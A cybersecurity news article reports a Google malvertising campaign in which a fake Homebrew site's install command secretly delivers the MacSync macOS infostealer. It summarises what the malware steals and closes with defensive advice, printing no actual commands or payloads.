Hackers replace top Google result for Homebrew with sponsored MacOS malware
Clicking the first link in Google search results for Homebrew, a major CLI package manager for macOS, can lead users to a malicious page that installs the MacSync infostealer malware, security researchers at the SANS Internet Storm Center (ISC) warn.
Cybercriminals are running malvertising campaigns on Google Search, buying sponsored results for Homebrew (Brew) that appear at the top rather than the original search results.
Bradley Duncan, a threat researcher, discovered malicious ads for fake Homebrew circulating on April 30th, 2026.
The impostor’s website is an exact replica of the original one, except for the featured command that installs Brew. Instead of the package manager, it pulls an infostealer.
Curious what others think about this story? Contribute your thoughts to the debate below.
“As MacBooks and Mac minis become more popular, we’re seeing more campaigns targeting these macOS hosts,” Duncan said in the report.
For users, it is nearly impossible to distinguish between the legitimate and fake versions of Brew.
The sponsored result was purchased using a legitimate, likely compromised account.
The top-level domain (URL) also appears legitimate because the landing page is hosted on Google’s own platform, Google Sites, which helps to bypass security alerts.
The website, like the original, requires pasting a command to the terminal to install Homebrew. The main difference is the command itself: hackers hide the actual payload within an encoded script.
If a victim copies, pastes, and runs it – the same procedure as installing Brew – they will be prompted to enter a password and grant additional access for the terminal, which might be expected when installing the software.
However, the process visually ends up in an error pop-up, claiming that the Mac doesn’t support this application.
The actual payload that runs in the background is MacSync Stealer, a relatively recent and evolving macOS malware.
“During the infection, MacSync Stealer collects information from the host, temporarily saves it to /tmp/osalogging.zip, and sends that file to the C2 server,” the researcher explained.
Cybernews previously reported that MacSync has many capabilities, including exfiltrating files and documents, displaying fake macOS password prompts to harvest credentials, stealing browser data, including cookies, logins, and extensions.
The malware steals data from Telegram, macOS Notes, and crypto wallets. It often establishes persistence by replacing legitimate crypto-wallet applications, such as Ledger Live or Trezor.
The malvertising campaigns are ongoing – at the beginning of 2026, Bitdefender discovered over 200 malicious ads impersonating popular Mac software on Google Search.
Duncan shares the recent indicators of compromise in the report. However, cybercrooks frequently rotate the flagged infrastructure, like command and control (C2) domains, IPs, and payloads.
Researchers recommend using ad blockers to remove trackers and malicious ads, or at least scrolling past sponsored results, as well as using security tools. Don’t run terminal commands found online that you don’t understand – legitimate software developers don’t encode scripts.
Unlock exclusive Cybernews content on YouTube.
